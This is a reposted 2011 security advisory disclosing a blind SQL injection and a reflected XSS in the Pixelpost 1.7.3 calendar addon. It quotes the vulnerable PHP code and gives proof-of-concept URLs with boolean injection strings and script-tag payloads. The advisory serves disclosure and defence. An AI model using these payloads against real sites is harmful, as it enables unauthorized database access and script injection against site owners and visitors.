Simone "negator" Onofri found multiple issues in a nice image gallery script that was going to use for his personal purposes, perhaps it's better to wait a couple of releases before using this in production. Since the vendor was not responsive this is a forced release. Found vulnerabilities include Blind SQL Injection and XSS.
Pixelpost (Calendar addon 1.1.6) 1.7.3 Multiple vulnerabilities Name Pixelpost (Calendar 1.1.6) 1.7.3 Multiple vulnerabilities Systems Affected Pixelpost v1.7.3 Severity High Impact High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C) Vendor http://www.pixelpost.org/ Advisory http://www.ush.it/team/negator/hack-pixelpost_173/adv.txt Author Simone "negator" Onofri Date 20110407 I. BACKGROUND Pixelpost is an open-source, standards-compliant, multi-lingual, fully extensible photoblog application for the web. II. DESCRIPTION Pixelpost "Calendar", a pretty looking image gallery written in PHP, is vulnerable to Blind SQL Injection and XSS. III. ANALYSIS Summary: A) Blind SQL Injection (SQLI) Vulnerability B) Reflected Cross Site Scirpting (XSS) Vulnerability A) Blind SQL Injection (SQLI) Vulnerability A blind SQL Injection vulnerability exists in Pixelpost version 1.7.3. The calendar functionality must be enabled, it's an addon distributed with the package but disabled by default. The GET variable "category" inserted into a SELECT query without sanitization and/or cast to an integer type on "addon/calendar.php": --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $query2 = mysql_query("SELECT a.* FROM ".$pixelpost_db_prefix."pixelpost a, ".$pixelpost_db_prefix."catassoc b WHERE b.cat_id = '" . $_GET["category"] . "' AND a.id = b.image_id AND (a.datetime like '$prev_browsing_month_day%') ORDER BY a.datetime desc limit 1"); --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- It's possible to exploit the issue in the standard blind way, for example using TRUE/FALSE statements (tautology based bisection). --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='1 http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='0 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- B) Reflected Cross Site Scripting (XSS) Vulnerability A Reflected Cross Site Scripting vulnerability exists in Pixelpost version 1.7.3 in the shipped by default but disabled calendar addon. The GET variables "curr_year" and "category" are reflected in page without proper encoding on "addon/calendar.php": --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $cal_vz .= " <table class='table-calendar-vz' cellspacing='0'> <tr> <td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$prev_mont h&curr_year=$prev_year&showimage=$prev_image_id$geos_cat_id'>&la quo;</a></td> <td colspan='5' class='td-calendar-navi-vz'> $asc_mon-$curr_year </td> <td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$next_mont h&curr_year=$next_year&showimage=$next_image_id$geos_cat_id'>&ra quo;</a></td> </tr> <tr>"; --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- PoC URL that exploits this vulnerability: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011'> <script>alert('XSS')</script>&showimage=3&category=1'><script>alert('XSS 2')</script> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- We did not investigate issues that may occour with globals on. IV. DETECTION Pixelpost 1.7.3 and possibly earlier versions are vulnerable. V. WORKAROUND No fix available. VI. VENDOR RESPONSE No Vendor response. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20110309 Bug discovered 20110309 Vendor contacted 20110321 Advisory release scheduled for 20110407 20110407 Advisory released IX. REFERENCES Well you know what a SQLi or XSS is, right? X. CREDIT Simone "negator" Onofri is credited for the discovery of this vulnerability. Thanks to Francesco "ascii" Ongaro for revision and fine editing. Simone "negator" Onofri web site: http://simone.onofri.net/ mail: simone AT onofri DOT net Francesco "ascii" Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it XI. LEGAL NOTICES Copyright (c) 2011 Francesco "ascii" Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.